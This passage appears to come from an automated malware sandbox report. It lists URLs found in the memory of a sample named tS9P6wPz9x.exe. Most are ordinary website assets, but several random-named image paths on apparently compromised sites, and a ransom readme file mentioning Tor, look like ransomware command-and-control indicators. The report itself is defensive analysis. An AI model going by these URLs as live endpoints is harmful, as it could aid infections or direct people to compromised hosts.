          Source: tS9P6wPz9x.exe, 00000000.00000003.536985973.00000000038ED000.00000004.00000001.sdmpString found in binary or memory: https://pierrehale.com/comments/feed/
          Source: tS9P6wPz9x.exe, 00000000.00000003.536985973.00000000038ED000.00000004.00000001.sdmpString found in binary or memory: https://pierrehale.com/feed/
          Source: tS9P6wPz9x.exe, 00000000.00000003.536985973.00000000038ED000.00000004.00000001.sdmpString found in binary or memory: https://pierrehale.com/wp-content/themes/neve/style.min.css?ver=2.5.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.536985973.00000000038ED000.00000004.00000001.sdmpString found in binary or memory: https://pierrehale.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3
          Source: tS9P6wPz9x.exe, 00000000.00000003.536985973.00000000038ED000.00000004.00000001.sdmpString found in binary or memory: https://pierrehale.com/wp-json/
          Source: tS9P6wPz9x.exe, 00000000.00000003.533049801.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://pierrehale.com:443/data/images/zaqg.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.536985973.00000000038ED000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
          Source: tS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmp, tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.552769617.00000000038EA000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpString found in binary or memory: https://schema.org
          Source: tS9P6wPz9x.exe, 00000000.00000003.475262020.0000000000BCF000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
          Source: tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net
          Source: tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/166.62.110.232/c93.18f.myftpupload.com/wp-content/plugins/woocommerce/as
          Source: tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/166.62.110.232/c93.18f.myftpupload.com/wp-content/plugins/woocommerce/pa
          Source: tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/166.62.110.232/c93.18f.myftpupload.com/wp-content/plugins/wp-quiz-pro/as
          Source: tS9P6wPz9x.exe, 00000000.00000003.463616465.0000000000C06000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/166.62.110.232/c93.18f.myftpupload.com/wp-includes/css/dist/block-librar
          Source: tS9P6wPz9x.exe, 00000000.00000003.533049801.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://stacyloeb.com:443/admin/pictures/zaxbpsbj.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.517413012.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://theduke.de/
          Source: tS9P6wPz9x.exe, 00000000.00000003.517436386.0000000000BFD000.00000004.00000001.sdmpString found in binary or memory: https://theduke.de:443/wp-content/game/ybtz.gif=Tue
          Source: tS9P6wPz9x.exe, 00000000.00000003.537157164.0000000000BEF000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.552472095.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://thewellnessmimi.com/content/images/oxvcjy.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.537157164.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://thewellnessmimi.com:443/content/images/oxvcjy.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.204300775.0000000002DF5000.00000004.00000040.sdmp, 4wfaj7427w-readme.txt.0.drString found in binary or memory: https://torproject.org/
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://tr5questions.org/
          Source: tS9P6wPz9x.exe, 00000000.00000002.597178188.0000000000B7E000.00000004.00000020.sdmpString found in binary or memory: https://transportesycementoshidalgo.es/
          Source: tS9P6wPz9x.exe, 00000000.00000002.597178188.0000000000B7E000.00000004.00000020.sdmpString found in binary or memory: https://transportesycementoshidalgo.es/Y9R
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://truenyc.co/
          Source: tS9P6wPz9x.exe, 00000000.00000003.515240536.00000000038F6000.00000004.00000001.sdmpString found in binary or memory: https://truenyc.co/?s=
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://truenyc.co/CF
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://truenyc.co/_F
          Source: tS9P6wPz9x.exe, 00000000.00000003.515240536.00000000038F6000.00000004.00000001.sdmpString found in binary or memory: https://truenyc.co/comments/feed/
          Source: tS9P6wPz9x.exe, 00000000.00000003.515240536.00000000038F6000.00000004.00000001.sdmpString found in binary or memory: https://truenyc.co/feed/
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://truenyc.co/static/image/gtkbwaiygsdn.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://truenyc.co/static/image/gtkbwaiygsdn.jpgg
          Source: tS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://truenyc.co:443/static/image/gtkbwaiygsdn.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.474321416.00000000038CA000.00000004.00000001.sdmpString found in binary or memory: https://trulynolen.ca/wp-content/uploads/2016/09/Mousecar-Canada.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.475105112.0000000000BDA000.00000004.00000001.sdmpString found in binary or memory: https://trulynolen.co.uk:443/static/pictures/xxidcvpd.gif
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://tulsawaterheaterinstallation.com/news/image/rf.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.487651393.0000000000BD6000.00000004.00000001.sdmpString found in binary or memory: https://tulsawaterheaterinstallation.com/news/image/rf.jpgvqL
          Source: tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpString found in binary or memory: https://tulsawaterheaterinstallation.com:443/news/image/rf.jpgy
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/YouBySia
          Source: tS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.8.1/css/all.css
          Source: tS9P6wPz9x.exe, 00000000.00000003.494503060.0000000000C0F000.00000004.00000001.sdmpString found in binary or memory: https://withahmed.com/Z
          Source: tS9P6wPz9x.exe, 00000000.00000003.494503060.0000000000C0F000.00000004.00000001.sdmpString found in binary or memory: https://withahmed.com/uploads/game/snzazo.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.494503060.0000000000C0F000.00000004.00000001.sdmpString found in binary or memory: https://withahmed.com/uploads/game/snzazo.jpgC
          Source: tS9P6wPz9x.exe, 00000000.00000003.494465726.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://withahmed.com:443/uploads/game/snzazo.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://wordpress.org/plugins/mailchimp-for-wp/
          Source: tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://www.365questions.org/
          Source: tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://www.365questions.org/#website
          Source: tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://www.365questions.org/?s=
          Source: tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://www.365questions.org/category/emploi/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/by-laser-treatment/thermique/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/by-skin-condition/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/by-skin-condition/acne-blackheads-breakout/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/by-skin-condition/aging-skin/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/by-skin-condition/dry-dehydrated-skin/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/by-skin-condition/enlarged-pores/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/by-skin-condition/loose-saggy-tummy/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/by-skin-condition/pigmentation-removal/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/by-skin-condition/rosacea-treatment/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/by-skin-condition/scar-removal-treatment/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/by-skin-condition/stretch-marks-removal/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/by-skin-condition/unwanted-hair/
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/by-treatment/laser-treatment/
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/by-treatment/skin-treatments/
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/by-treatment/thermique/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmp, tS9P6wPz9x.exe, 00000000.00000003.552385040.0000000000BE1000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/comments/feed/
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/contact-us/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/contact-us/laser-skin-clinic-bondi-junction/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/contact-us/laser-skin-clinic-sydney-cbd/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/dry-dehydrated-skin/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmp, tS9P6wPz9x.exe, 00000000.00000003.552283944.00000000038F1000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/enlarged-pores/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/facts-about-anti-aging-treatments-you-should-know/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/feed/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/laser-dry-skin-treatment-to-get-smooth-and-hydrated-skin/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/laser-hair-removal/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/laser-treatment/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/loose-saggy-tummy/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/membership/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/pigmentation/
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/privacy-policy/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/promotion
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/promotion/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/rosacea-treatment/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/skin-treatments/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/stretch-marks/
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/terms-conditions/
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/testimonial/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/thermique/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmp, tS9P6wPz9x.exe, 00000000.00000003.552283944.00000000038F1000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/this-is-why-we-recommend-lasers-for-rosacea-treatment/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/unwanted-hair/
          Source: tS9P6wPz9x.exe, 00000000.00000003.552472095.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/uploads/graphic/femvpu.pngk
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.2.2
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.2.2
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/plugins/mailchimp-for-wp/assets/js/forms.min.js?ver=4.8
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/animate.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/bootstrap.min.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/button.hover.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/custom.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/owl.carousel.min.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/owl.theme.default.min.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/responsive.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/youtubecss.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/images/banner/mobile/3.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/images/banner/mobile/4.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/images/banner/mobile/banner-1-mobile.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/images/banner/mobile/luxe-vip-mobile.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/images/icons/book-consult.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/images/inner-background/testimonial-bg.jpg);
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/images/logo/favicon.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/js/bootstrap.min.js?ver=1
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/js/jquery.min.js?ver=1
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/js/owl.carousel.min.js?ver=1
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/js/wow.min.js?ver=1
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/js/youtubejs.js?ver=1
          Source: tS9P6wPz9x.exe, 00000000.00000002.602709705.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uplo
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/06/1.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/06/2.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/06/3.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/06/4.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/06/5.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/06/6.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/1.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/1.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/10.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/2.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/3.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/4.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/5.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/6.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/7.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/8.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/9.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/Sia-Logo
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/afterpay.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/08/1-1.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/08/EOFY-40-FB-Post-1.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/09/Press-release-on-Socail-101-YouBySia.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/09/Sia-Hendry-podcast-LAser-Facial-Treatments.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/10/tlc.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/11/Coz-beauty-magazine.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/11/Group-194-1.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/11/Sunrise-7-show.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/11/spa-clinic-magazine.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Blog-Img_001.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Group-156.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Image-from-iOS.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Img-01.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/LGBT_flag-_YBS.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Youbysia_web-banner_v003-01.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Youbysia_web-banner_v003-1.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Youbysia_web-banner_v003-2.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Youbysia_web-banner_v003.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmp, tS9P6wPz9x.exe, 00000000.00000002.602709705.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/phone.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmp, tS9P6wPz9x.exe, 00000000.00000003.552283944.00000000038F1000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2021/01/rosacea-treatment.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2021/02/Laser-Treatment-for-Dry-skin-You-By-Sia-2.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2021/02/Popup-Design_v001-1.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-includes/css/dist/block-library/style.min.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-includes/js/wp-embed.min.js?ver=5.4.4
